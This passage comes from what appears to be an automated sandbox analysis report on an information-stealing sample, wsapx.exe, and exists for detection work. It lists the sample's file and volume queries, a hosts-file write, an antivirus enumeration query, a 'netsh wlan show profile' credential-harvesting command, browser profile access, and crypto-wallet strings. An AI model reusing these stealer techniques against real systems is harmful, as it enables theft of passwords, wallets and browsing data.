              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\System\System Info.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71BD080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7C71BD080
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D5EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7C71D5EEC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E6048CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,110_2_00007FF60E6048CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\wsapx.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000002.00000003.2648275073.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2653293501.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2152150044.0000015A08634000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2643435154.000001C87B04B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2152150044.0000015A08632000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wsapx.exe PID: 7372, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wsapx.exe PID: 7432, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI73722\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: wsapx.exe PID: 7432, type: MEMORYSTR
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fJaxx
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\wsapx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqliteJump to behavior
